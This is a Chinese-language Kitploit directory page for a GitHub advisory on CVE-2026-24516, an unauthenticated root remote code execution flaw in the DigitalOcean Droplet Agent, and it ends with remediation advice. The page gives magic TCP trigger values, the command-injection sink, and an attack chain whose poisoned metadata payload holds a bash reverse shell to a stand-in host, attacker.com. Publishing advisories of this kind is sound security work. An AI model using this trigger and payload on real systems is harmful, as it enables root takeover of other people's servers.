Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24516-DigitalOcean-RCE. — CVE-2026-24516 技术分析与 PoC:DigitalOcean Droplet Agent 中未经身份验证的 Root 远程代码执行(CVSS 10.0)。 | Kitploit
工具/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce.
权限提升漏洞分析漏洞利用Web应用程序漏洞利用信息收集后渗透利用云安全论文与研究红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubpoxsky/cve-2026-24516-digitalocean-rce.

CVE-2026-24516-DigitalOcean-RCE.

CVE-2026-24516 技术分析与 PoC:DigitalOcean Droplet Agent 中未经身份验证的 Root 远程代码执行(CVSS 10.0)。

查看仓库
6个月前尚未审核

CVE-2026-24516-DigitalOcean-RCE。

CVE-2026-24516 的技术分析与 PoC:DigitalOcean Droplet Agent 中的未认证 Root 远程代码执行(CVSS 10.0)。

技术安全公告:CVE-2026-24516

ID: CVE-2026-24516

标题: 通过元数据投毒与侧信道实现的未认证 Root RCE

严重性: 严重(CVSS v3.1:10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

研究员: Anmol Singh Rajput (@poxsky)

受影响: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2

================================================================================

  1. 架构概述

'droplet-agent' 是一个特权系统守护进程(UID 0),用于远程 遥测与诊断。它保持被动监控状态,直到接收到 特定的信令序列。核心漏洞在于链路本地元数据服务 (169.254.169.254)的“隐式信任模型”, 该模型缺乏加密完整性校验。

  1. 深入剖析:利用原语

A. 被动 TCP 侧信道(信令层) 该 agent 在 22 端口上使用原始套接字监听器 (internal/metadata/watcher/ssh_watcher.go)。 它根据 TCP 头部中硬编码的魔术常量,执行从 IDLE 到 ACTIVE 的 状态转换:

  • 序列号(Seq):0x419AD37 (68796879 -> "DODO")
  • 确认号(Ack):0xCF259 (848489 -> "TTY")

分析:这产生了一个确定性的触发器。外部攻击者可以通过伪造 带有这些魔术值的单个 TCP SYN 数据包, 冒充基础设施控制平面。

B. 信任边界违规(链路本地缺陷) 在收到信令后,该 agent 会从云元数据 端点获取 JSON 指令。该漏洞是缺乏真实性验证。该 agent 将 169.254.169.254 区域视为“加固的受信任区域”,未能验证 载荷签名(HMAC/mTLS)。

C. 汇聚点:未净化的命令注入 'TroubleshootingActioner'(internal/troubleshooting/actioner/actioner.go) 包含一个汇聚点,用于解析 'requesting' 数组。

  • 易受攻击的汇聚点:exec.CommandContext(ctx, name, args...)
  • 逻辑缺陷:验证逻辑仅执行前缀检查('command:')。 它未能对输入进行分词,也未净化 shell 元字符(;、|、&、$)。
  1. 武器化攻击链(SSRF 到 Root RCE)

  1. 冒充:攻击者在托管应用中识别出一个 SSRF,以代理 对链路本地元数据服务的请求。

  2. 投毒:攻击者搭建一个恶意元数据服务器,返回: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}

  3. 敲门:攻击者向 22 端口发送 "DODO-TTY" TCP 触发器。

  4. 执行:该 agent 获取被投毒的 JSON,并以有效 UID 0(Root) 执行反向 shell。

  5. 影响评估


  • 完全系统沦陷:完整的 kernel 级访问权限。
  • 持久化:能够注入 rootkit 或持久化 SSH 后门。
  • 租户风险:任何客户应用中的单个 SSRF 都会导致完整的 droplet 接管,绕过所有 OS 级防火墙。
  1. 修复策略

  • 加密完整性:为所有元数据载荷实现 JWT/HMAC 签名。
  • 命名空间隔离:在受限的 PID/网络命名空间中运行 actioner。
  • 允许列表:硬编码一组不可变的诊断二进制文件;拒绝所有 动态字符串输入。
1000071250 1000071254 1000071252 1000071246 1000071243 1000071244 1000071247 1000071249 1000071251
下载工具